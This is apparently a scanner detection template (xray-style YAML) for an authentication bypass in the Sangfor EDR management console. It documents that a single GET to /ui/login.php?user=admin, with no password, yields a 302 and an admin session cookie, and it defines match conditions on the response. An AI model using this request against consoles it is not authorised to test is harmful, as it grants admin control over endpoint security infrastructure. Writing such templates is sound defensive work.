漏洞描述
终端检测响应平台EDR（Sangfor EDR）：向 /ui/login.php?user=admin 发送不带口令的 GET 请求，服务端即返回 302 跳转并下发会话 Cookie，可直接以 admin 身份登录管理控制台（PoC 仅发起该单次 GET 并校验响应，不执行其他操作）。
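---
# Sangfor EDR (终端检测响应平台): admin login without a password via /ui/login.php.
# The single GET below supplies only a username. On an affected console the server
# answers with a 302 and issues a session cookie, i.e. it treats the caller as
# `admin` without any credential check. Nothing beyond this one request is sent.
id: sangfor-edr-arbitrary-admin-login
info:
  name: sangfor-edr-arbitrary-admin-login
  author: hilson
  # Rating kept from the original template. NOTE(review): unauthenticated admin
  # access to an EDR console arguably warrants "critical" given what the console
  # can push to managed endpoints — adjust to the project's severity scale.
  severity: high
  description: 终端检测响应平台EDR
  reference:
    - https://mp.weixin.qq.com/s/6aUrXcnab_EScoc0-6OKfA
rules:
  r0:
    request:
      method: GET
      # Username only, no password parameter at all.
      path: /ui/login.php?user=admin
      # The 302 is part of the evidence, so the redirect must not be followed.
      follow_redirects: false
    # Vulnerable only when all three hold on the *first* response:
    #   1. HTTP 302 (login "succeeded" and redirected),
    #   2. the body references the agent installer download path, and
    #   3. a Set-Cookie header is present (a session was issued).
    # Written as a folded scalar: it is parsed as exactly one line, and the
    # embedded `"` / `[` characters are never seen by the YAML parser.
    # NOTE(review): whether header names are matched case-insensitively and what
    # indexing a *missing* header yields (empty string vs. evaluation error)
    # depend on the runner's CEL environment — confirm against the xray build
    # in use; in both cases a missing cookie makes the rule fail, as intended.
    expression: >-
      response.status == 302
      && response.body.bcontains(b"/download/edr_installer_")
      && response.headers["set-cookie"] != ""
# The template fires when r0 alone matches.
expression: r0()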